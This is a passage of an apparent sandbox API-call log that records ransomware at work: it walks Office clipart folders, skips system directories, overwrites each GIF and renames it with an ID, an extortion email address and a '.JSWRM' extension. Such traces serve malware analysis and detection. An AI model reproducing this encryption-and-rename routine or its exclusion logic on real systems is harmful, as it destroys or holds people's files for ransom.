CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0099.282] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0099.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0099.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0099.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0099.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0099.283] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01241_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01241_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01241_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01241_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0099.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0099.283] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0099.283] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10491364, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x158, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01242_.GIF", cAlternateFileName="")) returned 1 [0099.283] lstrcmpiW (lpString1="WB01242_.GIF", lpString2=".") returned 1 [0099.283] lstrcmpiW (lpString1="WB01242_.GIF", lpString2="..") returned 1 [0099.283] lstrcmpiW (lpString1="WB01242_.GIF", lpString2="...") returned 1 [0099.284] lstrcmpiW (lpString1="WB01242_.GIF", lpString2="windows") returned -1 [0099.284] lstrcmpiW (lpString1="WB01242_.GIF", lpString2="recovery") returned 1 [0099.284] lstrcmpiW (lpString1="WB01242_.GIF", lpString2="perflogs") returned 1 [0099.284] lstrcmpiW (lpString1="WB01242_.GIF", lpString2="documents and settings") returned 1 [0099.284] lstrcmpiW (lpString1="WB01242_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.284] lstrcmpiW (lpString1="WB01242_.GIF", lpString2="system volume information") returned 1 [0099.284] lstrcmpiW (lpString1="WB01242_.GIF", lpString2="msocache") returned 1 [0099.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0099.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01242_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01242_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01242_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0099.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0099.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01242_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01242_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01242_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0099.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0099.284] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0099.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.284] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0099.284] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01242_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01242_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.285] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=344) returned 1 [0099.285] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x150) returned 0x21c578 [0099.285] ReadFile (in: hFile=0x314, lpBuffer=0x21c578, nNumberOfBytesToRead=0x150, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x21c578*, lpNumberOfBytesRead=0x345e89c*=0x150, lpOverlapped=0x0) returned 1 [0099.286] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.286] WriteFile (in: hFile=0x314, lpBuffer=0x21c578*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x21c578*, lpNumberOfBytesWritten=0x345e898*=0x150, lpOverlapped=0x0) returned 1 [0099.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0099.286] CloseHandle (hObject=0x314) returned 1 [0099.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0099.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0099.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0099.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0099.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0099.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0099.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0099.286] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0099.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0099.286] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0099.286] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01242_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01242_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01242_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01242_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0099.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0099.287] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0099.287] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1af, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01243_.GIF", cAlternateFileName="")) returned 1 [0099.287] lstrcmpiW (lpString1="WB01243_.GIF", lpString2=".") returned 1 [0099.287] lstrcmpiW (lpString1="WB01243_.GIF", lpString2="..") returned 1 [0099.287] lstrcmpiW (lpString1="WB01243_.GIF", lpString2="...") returned 1 [0099.287] lstrcmpiW (lpString1="WB01243_.GIF", lpString2="windows") returned -1 [0099.288] lstrcmpiW (lpString1="WB01243_.GIF", lpString2="recovery") returned 1 [0099.288] lstrcmpiW (lpString1="WB01243_.GIF", lpString2="perflogs") returned 1 [0099.288] lstrcmpiW (lpString1="WB01243_.GIF", lpString2="documents and settings") returned 1 [0099.288] lstrcmpiW (lpString1="WB01243_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.288] lstrcmpiW (lpString1="WB01243_.GIF", lpString2="system volume information") returned 1 [0099.288] lstrcmpiW (lpString1="WB01243_.GIF", lpString2="msocache") returned 1 [0099.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0099.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01243_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01243_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01243_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0099.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0099.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01243_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01243_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01243_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0099.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0099.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0099.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.288] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0099.288] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01243_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01243_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.289] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=431) returned 1 [0099.289] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a0) returned 0x1ff448 [0099.289] ReadFile (in: hFile=0x314, lpBuffer=0x1ff448, nNumberOfBytesToRead=0x1a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x1ff448*, lpNumberOfBytesRead=0x345e89c*=0x1a0, lpOverlapped=0x0) returned 1 [0099.290] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.290] WriteFile (in: hFile=0x314, lpBuffer=0x1ff448*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x1ff448*, lpNumberOfBytesWritten=0x345e898*=0x1a0, lpOverlapped=0x0) returned 1 [0099.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0099.290] CloseHandle (hObject=0x314) returned 1 [0099.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0099.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0099.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0099.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0099.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0099.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0099.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0099.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0099.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0099.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0099.290] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01243_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01243_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01243_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01243_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0099.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0099.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0099.291] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1d3, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01244_.GIF", cAlternateFileName="")) returned 1 [0099.291] lstrcmpiW (lpString1="WB01244_.GIF", lpString2=".") returned 1 [0099.291] lstrcmpiW (lpString1="WB01244_.GIF", lpString2="..") returned 1 [0099.291] lstrcmpiW (lpString1="WB01244_.GIF", lpString2="...") returned 1 [0099.291] lstrcmpiW (lpString1="WB01244_.GIF", lpString2="windows") returned -1 [0099.291] lstrcmpiW (lpString1="WB01244_.GIF", lpString2="recovery") returned 1 [0099.291] lstrcmpiW (lpString1="WB01244_.GIF", lpString2="perflogs") returned 1 [0099.291] lstrcmpiW (lpString1="WB01244_.GIF", lpString2="documents and settings") returned 1 [0099.291] lstrcmpiW (lpString1="WB01244_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.291] lstrcmpiW (lpString1="WB01244_.GIF", lpString2="system volume information") returned 1 [0099.291] lstrcmpiW (lpString1="WB01244_.GIF", lpString2="msocache") returned 1 [0099.291] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0099.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01244_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01244_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01244_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0099.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0099.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01244_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01244_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01244_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0099.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0099.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0099.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0099.292] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01244_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01244_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.292] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=467) returned 1 [0099.292] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1d0) returned 0x1ef508 [0099.292] ReadFile (in: hFile=0x314, lpBuffer=0x1ef508, nNumberOfBytesToRead=0x1d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x1ef508*, lpNumberOfBytesRead=0x345e89c*=0x1d0, lpOverlapped=0x0) returned 1 [0099.293] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.293] WriteFile (in: hFile=0x314, lpBuffer=0x1ef508*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x1ef508*, lpNumberOfBytesWritten=0x345e898*=0x1d0, lpOverlapped=0x0) returned 1 [0099.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ef508 | out: hHeap=0x1e0000) returned 1 [0099.293] CloseHandle (hObject=0x314) returned 1 [0099.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0099.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0099.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0099.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0099.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0099.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0099.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0099.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0099.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0099.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0099.294] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01244_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01244_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01244_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01244_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0099.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0099.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0099.295] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, 